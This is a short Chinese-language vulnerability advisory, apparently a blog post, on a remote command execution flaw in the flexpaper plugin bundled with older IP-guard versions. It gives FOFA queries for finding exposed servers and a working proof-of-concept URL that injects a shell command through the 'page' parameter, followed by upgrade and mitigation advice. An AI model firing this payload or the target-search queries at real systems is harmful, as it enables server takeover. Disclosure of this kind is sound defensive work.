简介
IP-guard是一款终端安全管理软件,旨在帮助企业保护终端设备安全、数据安全、管理网络使用和简化IT系统管理。在旧版本申请审批的文件预览功能用到了一个开源的插件 flexpaper,使用的这个插件版本存在远程命令执行漏洞,攻击者可利用该漏洞执行任意命令,获取服务器控制权限。
影响版本:IP-guard<4.81.0307.0
漏洞复现
FOFA语法:
app="IP-guard"
或者
web.title="IP-guard"
访问页面如下所示:
POC:
/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt
拼接URL进行get请求:
http://ip:port/ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+test+>test.txt
从浏览器访问后会直接下载一个文件证明请求成功
访问POC:/ipg/static/appr/lib/flexpaper/php/test.txt
成功执行写入的命令
攻击者可以利用漏洞获取对服务器的控制权
修复建议
1、产品升级方案
官方已发布新版本修复漏洞,建议尽快访问官网(https://www.ip-guard.net/)或联系官方售后支持获取版本升级安装包或补丁,升级至4.81.0307.0及以上。
2、临时缓解措施
- 配置入侵检测系统(IDS)和入侵防御系统(IPS)以及Web应用防火墙(WAF),以识别和阻止这类特征的请求,从而保护系统免受此类远程命令执行攻击的影响;同时为了避免攻击者绕过安全设备实施攻击,建议尽快修复漏洞。
- 如非必要,不要将 IP-guard 放置在公网上。或通过网络ACL策略限制访问来源,例如只允许来自特定IP地址或地址段的访问请求。
免责声明
文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行承担!!!
结语
没有人规定,一朵花一定要成长为向日葵或者玫瑰。